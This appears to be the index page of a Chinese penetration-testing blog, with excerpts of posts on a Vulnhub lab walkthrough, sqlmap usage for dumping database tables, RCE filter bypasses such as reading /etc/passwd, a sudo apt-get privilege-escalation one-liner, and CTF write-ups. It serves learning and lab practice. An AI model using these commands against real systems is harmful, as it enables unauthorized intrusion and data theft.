【渗透测试】Vulnhub Corrosion
[【渗透测试】Vulnhub Corrosion]渗透环境环境准备靶机下载地址:https://www.vulnhub.com/entry/corrosion-1,730/
攻击机: 192.168.207.130 (一般是本机ip)
靶机: 192.168.207.132
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式目标:获取目标靶机root目录下的flag
进行渗透一、 获取端口信息nmap或者arp-scan都能扫除IP,这里就不赘述了。先看看开放了哪些端口。
1arp-scan -l
扫描结果:
除了,192.168.207.1 ,192.168.207.2,192.168.207.254 之外
就只有192.168.207.132 ,它便是目标靶机
IPv4 后面的便是本机(攻击机)192.168.207.130
1nmap -A 192.168.207.132
扫描结果:
开放了22和80端口,访问80端口,可以正常访问。
二、 寻找WEB漏洞对目录进行扫描,经过测试,使用dirsearch ...
sql学习
sqlmap 的使用快速入门;SQLmap(常规)使用步骤
1、检测「注入点」
1sqlmap -u 'http://xx/?id=1'
2、查看所有「数据库」
1sqlmap -u 'http://xx/?id=1' --dbs
3、查看当前使用的数据库
1sqlmap -u 'http://xx/?id=1' --current-db
4、查看「数据表」
1sqlmap -u 'http://xx/?id=1' -D 'security' --tables
5、查看「字段」
1sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' --tables
6、查看「数据」
1sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' --dump
真正执行过程一 ...
RCE绕过方法
RCE提升篇RCE绕过方法空格绕过:在bash下可以用$IFS、${IFS}、$IFS$9、%09、<、>、<>、{,}(例如{cat,/etc/passwd} )、%20(space)、%09(tab),这儿跟sql注入有点相似,用/**/注释也能绕过。
命令执行函数system()绕过(在URL请求中过滤system()函数)系统命令函数system() passthru() exec() shell_exec() popen() proc_open() pcntl_exec() 反引号(·) 同shell_exec()用以上函数都可进行绕过。
命令连接符:Windows和Linux都支持的命令连接符:
cmd1 | cmd2 只执行cmd2
cmd1 || cmd2 只有当cmd1执行失败后,cmd2才被执行
cmd1 & cmd2 先执行cmd1,不管是否成功,都会执行cmd2
cmd1 && cmd2 先执行cmd1,cmd1执行成功后才执行cmd2,否则不执行cmd2
Linux还支持分 ...
渗透学习
linux命令类(继续更新中)命令1:查找所有目录
123find / -type f -user ctfgame -readable 2>/dev/null
命令 2:登录用户下面,执行显示当前用户有哪些权限
1sudo -l
命令3:添加用户
12sudo adduser (用户名)sudo adduser (用户名)-gid=0:添加到root目录下
命令4:显示当前用户
1id
命令5:登录用户
1su (用户名)
命令6:apt-get提权
1sudo apt-get update -o APT::Update::Pre-Invoke::="/bin/bash -i"
暑期训练第一周
read-data先下载附件顺便打开题目
1234567891011121314151617181920212223242526272829303132333435const express = require('express')const app = express();const port = 3000;const fs = require('fs')try { const inputD = fs.readFileSync('table.txt', 'utf-8'); text = inputD.toString().split("\n").map(e => e.trim());} catch (err) { console.error("读取文件出错:", err); process.exit(1);}app.get('/', (req, res) => { ...
刷题训练
Please_RCE_Me/这题挺简单的妥妥签到题/
打开题目,得到提示GET传moran=flag
可以看到源码
分析源码,需要利用的函数是preg_replace(),使用了/e修饰符,当第一个参数的字符串在第三个参数中检测到时,会将第二个参数作为php代码执行,且使用了/i的修饰符,大小写不敏感
需要绕过正则匹配
能直接用的命令执行函数基本上都被过滤了,限制了flag字符串长度,并且过滤了preg_replace()中的please_give_me_flag,但是没有使用/i大小写不敏感,所以可以用大写绕过
task参数传入的为我们需要执行的代码,flag参数传入含有please_give_me_flag的字符串
查阅可以进行RCE的函数,发现还有一个array_map()可以使用
array_map()需传入两个参数,第一个参数为使用的函数,第二个参数为一个数组,并且数组的数据为函数的参数,例如
12&arr = array('phpinfo()');array_map('assert' ...
Hello World
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
Quick StartCreate a new post1$ hexo new "My New Post"
More info: Writing
Run server1$ hexo server
More info: Server
Generate static files1$ hexo generate
More info: Generating
Deploy to remote sites1$ hexo deploy
More info: Deployment